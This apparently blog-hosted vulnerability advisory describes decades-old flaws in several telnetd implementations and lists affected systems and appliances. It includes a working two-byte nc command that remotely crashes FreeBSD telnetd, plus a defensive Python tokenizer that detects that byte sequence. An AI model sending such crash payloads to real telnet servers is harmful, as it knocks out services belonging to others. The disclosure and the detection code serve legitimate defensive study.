FreeBSD-telnetd, NetBSD-telnetd, netkit-telnetd, telnetd in Kerberos Version 5 Applications and inetutils-telnetd are standard telnet servers used in several Linux distributions, BSD systems, UNIX systems and commercial products:
- FreeBSD, NetBSD
- Debian, Fedora, Gentoo, ArchLinux, … – using inetutils-telnetd or netkit-telnetd
- specific Palo Alto appliances
- specific Cisco appliances
- specific Brocade appliances
- specific Arista appliances
- Operating systems running telnetd from Kerberos Version 5 Applications: this may include BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOS 3.5 to SunOS 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. Note that these operating systems may be EOL.
- …
From our understanding, the first implementation containing the vulnerabilities dates from February 1991. This is the Kerberos telnetd implementation available at https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/telnetd.
This code was merged into FreeBSD in the 90s. netkit-telnetd in turn derives from a very old version of the FreeBSD telnetd, and inetutils-telnetd is a fork of netkit-telnetd.
These vulnerabilities are very old (at least 30 years).
In all these implementations, the vulnerable part of the code base has not been updated for 30 years and appears not to be maintained anymore.
Part of the list of affected products was obtained by using CVE-2020-10188 (a vulnerability in netkit-telnetd): advisories from Cisco, Palo Alto, Brocade and Arista reference CVE-2020-10188 in their products.
Furthermore, according to https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/README, the release date is February 22, 1991 and the supported operating systems are BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOS 3.5 to SunOS 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. We can assume that these operating systems, when running kerberos-telnetd, are also vulnerable.
It is possible to remotely crash the “standard” FreeBSD telnetd server by sending 2 bytes (\xff\xf7) from the network, as shown below:
kali% printf "\xff\xf7" | nc -n -v 192.168.1.200 23
(UNKNOWN) [192.168.1.200] 23 (telnet) open
<FF><FD>%
kali%
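For detection purposes, the two bytes above are the Telnet commands IAC (0xff) and EC, Erase Character (0xf7), as defined in RFC 854. The following is an added example, not code from the original post or from any telnetd project: a small tokenizer for the client side of a Telnet stream that flags IAC EC arriving before any user data. The "before any data" rule is an assumed heuristic, and the sample streams are constructed.

```python
# Telnet command bytes from RFC 854 (protocol constants, not taken from the post).
IAC, EC, SB, SE = 0xFF, 0xF7, 0xFA, 0xF0
NEGOTIATION = {0xFB, 0xFC, 0xFD, 0xFE}  # WILL, WONT, DO, DONT: one option byte follows

def tokenize(stream: bytes):
    """Yield ("data", b), ("cmd", b), ("neg", verb, opt) or ("sb", payload)."""
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            yield ("data", stream[i])
            i += 1
        elif i + 1 >= n:
            return  # lone trailing IAC: capture was truncated
        elif stream[i + 1] == IAC:
            yield ("data", IAC)  # IAC IAC is an escaped literal 0xFF, not a command
            i += 2
        elif stream[i + 1] in NEGOTIATION:
            if i + 2 >= n:
                return
            yield ("neg", stream[i + 1], stream[i + 2])
            i += 3
        elif stream[i + 1] == SB:
            j = i + 2  # walk to the terminating IAC SE, skipping escaped IAC pairs
            while j + 1 < n and not (stream[j] == IAC and stream[j + 1] == SE):
                j += 2 if stream[j] == IAC else 1
            if j + 1 >= n:
                return  # unterminated subnegotiation
            yield ("sb", stream[i + 2:j])
            i = j + 2
        else:
            yield ("cmd", stream[i + 1])
            i += 2

def early_erase_char(client_stream: bytes) -> bool:
    """Assumed heuristic: IAC EC seen before any user data byte is suspicious."""
    for tok in tokenize(client_stream):
        if tok[0] == "data":
            return False  # the user has typed something; EC is plausible editing
        if tok == ("cmd", EC):
            return True
    return False

# Constructed client-to-server streams (not captured traffic).
SAMPLES = {
    "two_bytes_from_post": b"\xff\xf7",
    "after_negotiation": b"\xff\xfb\x18\xff\xfa\x18\x00xterm\xff\xf0\xff\xf7",
    "normal_editing": b"\xff\xfb\x18roo\xff\xf7ot\r\n",
}
print({name: early_erase_char(s) for name, s in SAMPLES.items()})
```

Feed it the reassembled client-to-server payload of each TCP session to port 23; a hit followed by an immediate connection close or a telnetd restart is worth correlating.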
Do you mind if I quote a few of your articles as long as I provide credit and sources back to your weblog? My blog site is in the exact same area of interest as yours and my visitors would definitely benefit from a lot of the information you provide here. Please let me know if this is okay with you.
Cheers!
sure